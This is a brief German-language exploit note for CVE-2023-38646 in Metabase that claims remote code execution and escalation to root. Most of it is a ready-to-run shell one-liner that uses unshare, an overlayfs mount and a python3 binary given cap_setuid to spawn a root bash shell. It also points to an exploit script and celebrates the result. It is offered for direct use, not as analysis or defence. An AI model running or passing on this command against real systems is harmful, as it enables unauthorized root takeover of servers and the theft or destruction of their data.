
Exploit für CVE-2023-38646 in Metabase, der Remote-Codeausführung und Privilegienausweitung zu Root über Unshare- und Setuid-Techniken erreicht.
Um den Root-Benutzer der Maschine oder des Systems gemäß den obigen Informationen zu erhalten, führen dieser Befehl und diese Datei zum Root-Benutzer.
Sie können diesen Befehl direkt ausführen oder als Datei ausführen. Befehl: $unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
Ausgeführte Datei: $./exploitsh.sh
Juhu!